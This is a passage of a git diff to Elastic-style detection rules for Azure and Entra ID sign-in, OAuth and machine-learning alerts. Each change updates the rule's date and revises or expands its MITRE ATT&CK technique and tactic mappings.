= "Steal Application Access Token" +reference = "https://attack.mitre.org/techniques/T1528/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" [rule.new_terms] field = "new_terms_fields" value = ["azure.signinlogs.properties.user_principal_name"] diff --git a/rules/integrations/azure/initial_access_entra_id_graph_single_session_from_multiple_addresses.toml b/rules/integrations/azure/initial_access_entra_id_graph_single_session_from_multiple_addresses.toml index 67c5edccbc2..cd73e02ab6e 100644 --- a/rules/integrations/azure/initial_access_entra_id_graph_single_session_from_multiple_addresses.toml +++ b/rules/integrations/azure/initial_access_entra_id_graph_single_session_from_multiple_addresses.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/08" integration = ["azure"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -190,36 +190,41 @@ from logs-azure.signinlogs-*, logs-azure.graphactivitylogs-* metadata _id, _vers [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" + [[rule.threat.technique.subtechnique]] id = "T1550.001" name = "Application Access Token" reference = "https://attack.mitre.org/techniques/T1550/001/" - +[[rule.threat.technique.subtechnique]] +id = "T1550.004" +name = "Web Session Cookie" +reference = "https://attack.mitre.org/techniques/T1550/004/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - diff --git a/rules/integrations/azure/initial_access_entra_id_illicit_consent_grant_via_registered_application.toml b/rules/integrations/azure/initial_access_entra_id_illicit_consent_grant_via_registered_application.toml index fd3737f9131..dd13f3c1aa0 100644 --- a/rules/integrations/azure/initial_access_entra_id_illicit_consent_grant_via_registered_application.toml +++ b/rules/integrations/azure/initial_access_entra_id_illicit_consent_grant_via_registered_application.toml @@ -2,7 +2,7 @@ creation_date = "2020/09/01" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -91,34 +91,47 @@ event.dataset: "azure.auditlogs" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1528" name = "Steal Application Access Token" reference = "https://attack.mitre.org/techniques/T1528/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/azure/initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml b/rules/integrations/azure/initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml index 84bf8f56d93..7e5c8cc7b8f 100644 --- a/rules/integrations/azure/initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml +++ b/rules/integrations/azure/initial_access_entra_id_oauth_auth_code_grant_unusual_app_resource_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/17" integration = ["azure"] maturity = "production" -updated_date = "2026/01/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -139,44 +139,62 @@ event.dataset: "azure.signinlogs" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1528" name = "Steal Application Access Token" reference = "https://attack.mitre.org/techniques/T1528/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/azure/initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml b/rules/integrations/azure/initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml index d8d3ad94d2c..b8869e67cbe 100644 --- a/rules/integrations/azure/initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml +++ b/rules/integrations/azure/initial_access_entra_id_oauth_phishing_via_first_party_microsoft_application.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/23" integration = ["azure"] maturity = "production" -updated_date = "2026/01/24" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -139,41 +139,59 @@ event.outcome: "success" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1528" name = "Steal Application Access Token" reference = "https://attack.mitre.org/techniques/T1528/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/azure/initial_access_entra_id_protection_alerts_for_user.toml b/rules/integrations/azure/initial_access_entra_id_protection_alerts_for_user.toml index c3b919b802c..6913e3e883a 100644 --- a/rules/integrations/azure/initial_access_entra_id_protection_alerts_for_user.toml +++ b/rules/integrations/azure/initial_access_entra_id_protection_alerts_for_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/30" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -80,19 +80,54 @@ sequence by azure.identityprotection.properties.user_principal_name with maxspan [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/azure/initial_access_entra_id_protection_confirmed_compromise.toml b/rules/integrations/azure/initial_access_entra_id_protection_confirmed_compromise.toml index fdff812e200..2fd952ddac8 100644 --- a/rules/integrations/azure/initial_access_entra_id_protection_confirmed_compromise.toml +++ b/rules/integrations/azure/initial_access_entra_id_protection_confirmed_compromise.toml @@ -2,7 +2,7 @@ creation_date = "2025/10/06" integration = ["azure"] maturity = "production" -updated_date = "2025/10/06" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -107,22 +107,57 @@ event.dataset: azure.identity_protection and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" [rule.investigation_fields] field_names = [ "@timestamp", diff --git a/rules/integrations/azure/initial_access_entra_id_rare_app_id_for_principal_auth.toml b/rules/integrations/azure/initial_access_entra_id_rare_app_id_for_principal_auth.toml index da8c29614c4..d0ac2d950ae 100644 --- a/rules/integrations/azure/initial_access_entra_id_rare_app_id_for_principal_auth.toml +++ b/rules/integrations/azure/initial_access_entra_id_rare_app_id_for_principal_auth.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/10" integration = ["azure"] maturity = "production" -updated_date = "2025/12/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -123,34 +123,52 @@ event.dataset: "azure.signinlogs" and event.category: "authentication" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1528" name = "Steal Application Access Token" reference = "https://attack.mitre.org/techniques/T1528/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.investigation_fields] field_names = [ "azure.signinlogs.properties.user_principal_name", diff --git a/rules/integrations/azure/initial_access_entra_id_rare_authentication_requirement_for_principal_user.toml b/rules/integrations/azure/initial_access_entra_id_rare_authentication_requirement_for_principal_user.toml index 6ec4110788e..cb949f7b855 100644 --- a/rules/integrations/azure/initial_access_entra_id_rare_authentication_requirement_for_principal_user.toml +++ b/rules/integrations/azure/initial_access_entra_id_rare_authentication_requirement_for_principal_user.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/10" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -94,17 +94,17 @@ event.dataset: "azure.signinlogs" and event.category: "authentication" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" @@ -112,34 +112,44 @@ reference = "https://attack.mitre.org/tactics/TA0001/" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" + [[rule.threat.technique.subtechnique]] id = "T1110.003" name = "Password Spraying" reference = "https://attack.mitre.org/techniques/T1110/003/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1550" name = "Use Alternate Authentication Material" reference = "https://attack.mitre.org/techniques/T1550/" +[[rule.threat.technique]] +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" + +[[rule.threat.technique.subtechnique]] +id = "T1556.006" +name = "Multi-Factor Authentication" +reference = "https://attack.mitre.org/techniques/T1556/006/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - [rule.new_terms] field = "new_terms_fields" value = [ diff --git a/rules/integrations/azure/initial_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml b/rules/integrations/azure/initial_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml index a80ea2d7227..74b30ff9e01 100644 --- a/rules/integrations/azure/initial_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml +++ b/rules/integrations/azure/initial_access_entra_id_suspicious_oauth_flow_via_auth_broker_to_drs.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/30" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -193,10 +193,12 @@ from logs-azure.signinlogs-* metadata _id, _version, _index [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" @@ -206,27 +208,44 @@ reference = "https://attack.mitre.org/techniques/T1078/004/" id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1528" name = "Steal Application Access Token" reference = "https://attack.mitre.org/techniques/T1528/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/azure/initial_access_entra_id_unusual_ropc_login_attempt.toml b/rules/integrations/azure/initial_access_entra_id_unusual_ropc_login_attempt.toml index 99d562c6880..c44ae464c92 100644 --- a/rules/integrations/azure/initial_access_entra_id_unusual_ropc_login_attempt.toml +++ b/rules/integrations/azure/initial_access_entra_id_unusual_ropc_login_attempt.toml @@ -2,7 +2,7 @@ creation_date = "2025/07/02" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -80,22 +80,39 @@ event.dataset: "azure.signinlogs" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = ["azure.signinlogs.properties.user_principal_name"] diff --git a/rules/integrations/azure/initial_access_entra_id_user_reported_risk.toml b/rules/integrations/azure/initial_access_entra_id_user_reported_risk.toml index 4af77d21fd9..ffd21e01236 100644 --- a/rules/integrations/azure/initial_access_entra_id_user_reported_risk.toml +++ b/rules/integrations/azure/initial_access_entra_id_user_reported_risk.toml @@ -2,7 +2,7 @@ creation_date = "2025/05/21" integration = ["azure"] maturity = "production" -updated_date = "2025/12/10" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Willem D'Haese"] @@ -80,18 +80,31 @@ event.dataset: "azure.auditlogs" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1621" +name = "Multi-Factor Authentication Request Generation" +reference = "https://attack.mitre.org/techniques/T1621/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/integrations/azure/initial_access_graph_first_occurrence_of_client_request.toml b/rules/integrations/azure/initial_access_graph_first_occurrence_of_client_request.toml index 53b7a160471..030a4b2202d 100644 --- a/rules/integrations/azure/initial_access_graph_first_occurrence_of_client_request.toml +++ b/rules/integrations/azure/initial_access_graph_first_occurrence_of_client_request.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/23" integration = ["azure"] maturity = "production" -updated_date = "2026/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -114,34 +114,52 @@ event.dataset: "azure.graphactivitylogs" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" reference = "https://attack.mitre.org/techniques/T1078/" + [[rule.threat.technique.subtechnique]] id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1528" name = "Steal Application Access Token" reference = "https://attack.mitre.org/techniques/T1528/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1550" +name = "Use Alternate Authentication Material" +reference = "https://attack.mitre.org/techniques/T1550/" + +[[rule.threat.technique.subtechnique]] +id = "T1550.001" +name = "Application Access Token" +reference = "https://attack.mitre.org/techniques/T1550/001/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" [rule.new_terms] field = "new_terms_fields" value = [ diff --git a/rules/integrations/azure/ml_azure_rare_event_failures.toml b/rules/integrations/azure/ml_azure_rare_event_failures.toml index 9e1182f57d9..98a52ccc75f 100644 --- a/rules/integrations/azure/ml_azure_rare_event_failures.toml +++ b/rules/integrations/azure/ml_azure_rare_event_failures.toml @@ -4,7 +4,7 @@ integration = ["azure"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2025/12/08" +updated_date = "2026/03/24" [rule] anomaly_threshold = 50 @@ -91,11 +91,6 @@ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" - [[rule.threat.technique]] id = "T1526" name = "Cloud Service Discovery" @@ -106,9 +101,34 @@ id = "T1580" name = "Cloud Infrastructure Discovery" reference = "https://attack.mitre.org/techniques/T1580/" +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" + [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[[rule.threat.technique]] +id = "T1098" +name = "Account Manipulation" +reference = "https://attack.mitre.org/techniques/T1098/" + +[[rule.threat.technique.subtechnique]] +id = "T1098.003" +name = "Additional Cloud Roles" +reference = "https://attack.mitre.org/techniques/T1098/003/" + [rule.threat.tactic] id = "TA0004" name = "Privilege Escalation" @@ -117,14 +137,6 @@ reference = "https://attack.mitre.org/tactics/TA0004/" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" @@ -133,16 +145,7 @@ reference = "https://attack.mitre.org/tactics/TA0008/" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0003" -name = "Persistence" -reference = "https://attack.mitre.org/tactics/TA0003/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [rule.threat.tactic] id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" - diff --git a/rules/integrations/azure/ml_azure_rare_method_by_city.toml b/rules/integrations/azure/ml_azure_rare_method_by_city.toml index 84f94ffc52b..cba37cb9c9f 100644 --- a/rules/integrations/azure/ml_azure_rare_method_by_city.toml +++ b/rules/integrations/azure/ml_azure_rare_method_by_city.toml @@ -4,7 +4,7 @@ integration = ["azure"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2025/12/08" +updated_date = "2026/03/24" [rule] anomaly_threshold = 50 @@ -93,11 +93,42 @@ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -107,3 +138,8 @@ reference = "https://attack.mitre.org/techniques/T1078/" id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/integrations/azure/ml_azure_rare_method_by_country.toml b/rules/integrations/azure/ml_azure_rare_method_by_country.toml index bbaf6442692..8ab7ffc6687 100644 --- a/rules/integrations/azure/ml_azure_rare_method_by_country.toml +++ b/rules/integrations/azure/ml_azure_rare_method_by_country.toml @@ -4,7 +4,7 @@ integration = ["azure"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2025/12/08" +updated_date = "2026/03/24" [rule] anomaly_threshold = 50 @@ -92,11 +92,24 @@ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -106,3 +119,8 @@ reference = "https://attack.mitre.org/techniques/T1078/" id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/integrations/azure/ml_azure_rare_method_by_user.toml b/rules/integrations/azure/ml_azure_rare_method_by_user.toml index 2dd9dacbf77..71251715303 100644 --- a/rules/integrations/azure/ml_azure_rare_method_by_user.toml +++ b/rules/integrations/azure/ml_azure_rare_method_by_user.toml @@ -4,7 +4,7 @@ integration = ["azure"] maturity = "production" min_stack_comments = "New job added" min_stack_version = "9.3.0" -updated_date = "2025/12/08" +updated_date = "2026/03/24" [rule] anomaly_threshold = 75 @@ -91,11 +91,6 @@ type = "machine_learning" [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0001" -name = "Initial Access" -reference = "https://attack.mitre.org/tactics/TA0001/" - [[rule.threat.technique]] id = "T1078" name = "Valid Accounts" @@ -106,14 +101,14 @@ id = "T1078.004" name = "Cloud Accounts" reference = "https://attack.mitre.org/techniques/T1078/004/" +[rule.threat.tactic] +id = "TA0001" +name = "Initial Access" +reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0008" -name = "Lateral Movement" -reference = "https://attack.mitre.org/tactics/TA0008/" - [[rule.threat.technique]] id = "T1021" name = "Remote Services" @@ -124,9 +119,24 @@ id = "T1021.007" name = "Cloud Services" reference = "https://attack.mitre.org/techniques/T1021/007/" +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" + [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" + +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = "https://attack.mitre.org/techniques/T1078/004/" + [rule.threat.tactic] id = "TA0003" name = "Persistence" @@ -135,13 +145,30 @@ reference = "https://attack.mitre.org/tactics/TA0003/" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1041" +name = "Exfiltration Over C2 Channel" +reference = "https://attack.mitre.org/techniques/T1041/" + [rule.threat.tactic] id = "TA0010" name = "Exfiltration" reference = "https://attack.mitre.org/tactics/TA0010/" +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] -id = "T1041" -name = "Exfiltration Over C2 Channel" -reference = "https://attack.mitre.org/techniques/T1041/" +id = "T1078" +name = "Valid Accounts" +reference = "https://attack.mitre.org/techniques/T1078/" +[[rule.threat.technique.subtechnique]] +id = "T1078.004" +name = "Cloud Accounts" +reference = 